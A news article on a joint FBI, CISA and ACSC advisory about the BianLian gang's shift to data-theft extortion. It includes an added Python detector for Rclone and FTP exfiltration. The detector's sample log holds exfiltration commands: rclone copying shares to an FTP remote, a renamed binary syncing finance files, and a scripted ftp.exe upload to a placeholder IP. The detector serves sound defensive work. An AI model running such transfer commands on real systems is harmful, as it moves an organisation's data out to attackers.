The FBI, the Cybersecurity and Infrastructure Security Agency, and the Australian Cyber Security Centre have released a joint cyber security advisory on the changing tactics of the BianLian ransomware gang.
In fact, the advisory confirms what security researchers had observed back in March 2022 — namely that the gang is shifting away from ransomware operations and moving to strictly extortion-based campaigns against its targets.
BianLian has been active since at least June 2022 and is known to have targeted critical infrastructure in both Australia and the US. Its tactics include using Remote Desktop Protocol credentials alongside open source tools to encrypt and exfiltrate data via a number of methods, such as FTP or Rclone.
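The advisory's description of exfiltration over FTP or Rclone points at where a defender can look: process-creation telemetry. The following is an added example written for this article, not code from the advisory or from any of the agencies named; it runs a small set of heuristics over constructed, simplified JSON-lines process-creation events (the field names, hosts, users and paths are assumptions, not a real EDR or Sysmon schema) and flags Rclone-style transfers to a remote, including a renamed binary that still uses rclone's `verb source remote:path` syntax, and scripted `ftp.exe` sessions.

```python
"""Flag process-creation events that look like Rclone/FTP bulk data transfers.

Constructed example: the JSON-lines below stand in for an EDR/Sysmon
process-creation feed; field names (host, user, image, cmdline) are assumed.
"""
import json
import os
import shlex
from typing import Dict, List

# rclone subcommands that move data; an rclone remote is written "name:path"
# or ":backend:path" for an on-the-fly backend such as ":ftp:/dir".
RCLONE_TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
FTP_CLIENTS = {"ftp.exe", "ftp", "sftp", "lftp", "curl.exe", "curl"}

# Constructed sample events (hosts, users, paths and the IP are made up;
# 198.51.100.0/24 is a documentation range).
SAMPLE_LOG = r'''
{"host":"ws01","user":"corp\\jdoe","image":"C:\\Windows\\System32\\notepad.exe","cmdline":"notepad.exe notes.txt"}
{"host":"ws02","user":"corp\\svc_backup","image":"C:\\Tools\\rclone.exe","cmdline":"rclone.exe copy C:\\Share ftp-remote:/loot --transfers 32"}
{"host":"ws03","user":"corp\\jdoe","image":"C:\\Users\\Public\\svchost.exe","cmdline":"svchost.exe sync \"C:\\Finance\" :ftp:/upload --config C:\\Users\\Public\\r.conf"}
{"host":"ws04","user":"corp\\jdoe","image":"C:\\Windows\\System32\\ftp.exe","cmdline":"ftp.exe -s:C:\\Users\\Public\\up.txt 198.51.100.5"}
{"host":"ws05","user":"corp\\asmith","image":"C:\\Windows\\System32\\curl.exe","cmdline":"curl.exe https://www.example.com/"}
{"host":"ws06","user":"corp\\asmith","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -c Get-Process"}
'''


def _basename(path: str) -> str:
    return os.path.basename(path.replace("\\", "/")).lower()


def _is_rclone_remote(arg: str) -> bool:
    """True for 'name:path' / ':backend:path'; a Windows drive like C:\\x is excluded.

    (A single-letter remote name would be missed by the drive-letter check.)
    """
    if arg.startswith("-"):
        return False
    if len(arg) >= 2 and arg[1] == ":":
        return False
    return ":" in arg


def inspect_event(event: Dict) -> List[str]:
    """Return the reasons an event looks like a bulk transfer; empty if benign."""
    reasons: List[str] = []
    image = _basename(event.get("image", ""))
    cmdline = event.get("cmdline", "")
    try:
        # Non-POSIX mode keeps Windows backslashes and quoted paths intact.
        argv = shlex.split(cmdline, posix=False)
    except ValueError:
        argv = cmdline.split()
    tokens = [t.strip('"').lower() for t in argv]

    # Rule 1: rclone-style transfer (verb + remote), even if the binary is renamed.
    looks_like_rclone = image.startswith("rclone") or (
        bool(tokens) and _basename(tokens[0]).startswith("rclone")
    )
    verbs = RCLONE_TRANSFER_VERBS & set(tokens)
    remotes = [t for t in tokens if _is_rclone_remote(t)]
    if verbs and remotes:
        note = "" if looks_like_rclone else " (binary not named rclone)"
        reasons.append(f"rclone-style transfer '{sorted(verbs)[0]}' to remote {remotes[-1]}{note}")
    elif looks_like_rclone:
        reasons.append("rclone executed")

    # Rule 2: command-line FTP clients, scripted ftp.exe (-s:file) or ftp URLs.
    if image in FTP_CLIENTS:
        if image.startswith("ftp") and any(t.startswith("-s:") for t in tokens):
            reasons.append("scripted ftp.exe session (-s:)")
        elif any(t.startswith(("ftp://", "ftps://", "sftp://")) for t in tokens):
            reasons.append("ftp URL on command line")
        elif image in ("sftp", "lftp"):
            reasons.append(f"{image} launched")
    return reasons


def detect_exfil(log_text: str) -> List[Dict]:
    """Parse JSON-lines events and return one finding per suspicious event."""
    findings = []
    for line in log_text.strip().splitlines():
        event = json.loads(line)
        reasons = inspect_event(event)
        if reasons:
            findings.append({"host": event.get("host"), "user": event.get("user"),
                             "image": event.get("image"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect_exfil(SAMPLE_LOG):
        print(f["host"], f["user"], f["image"], "->", "; ".join(f["reasons"]))
```

The heuristics are deliberately syntax-based rather than name-based: matching only on `rclone.exe` misses a renamed copy, whereas the `verb source remote:path` shape and the `--config` flag survive renaming. Pair this with network telemetry (outbound FTP/SFTP volume from workstations that never used it before) to cut false positives from legitimate backup jobs.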
The group had used a double extortion methodology: it demanded a ransom both to release the encryption key needed to restore data and to refrain from publishing the data it had exfiltrated.
However, following the release of a software tool by Avast to decrypt files without recourse to paying a ransom, the group started to move away from using ransomware. The new advisory confirms the change in tactics.
“In 2023, FBI observed BianLian shift to primarily exfiltration-based extortion with victims’ systems left intact, and ACSC observed BianLian shift exclusively to exfiltration-based extortion,” the advisory read. “BianLian actors warn of financial, business, and legal ramifications if payment is not made.”
Aside from contacting organisations by leaving a ransom note in the wake of its exfiltration operations, BianLian has used a number of other techniques to apply pressure on its victims. It has been known to target networked printers to share ransom notes en masse and to harass individual employees via phone.
But BianLian, as of March, maintains that while its intentions may be criminal, it still intends to be somewhat honourable about things.
“Our business depends on the reputation even more than many others,” the group has said in the past. “If we will take money and spread your information — we will have issues with payments in future. So, we will stick to our promises and reputation.”
“That works in both ways: if we said that we will email all your staff and publicly spread all your data — we will.”
David Hollingworth has been writing about technology for over 20 years, and has worked for a range of print and online titles in his career. He is enjoying getting to grips with cyber security, especially when it lets him talk about Lego.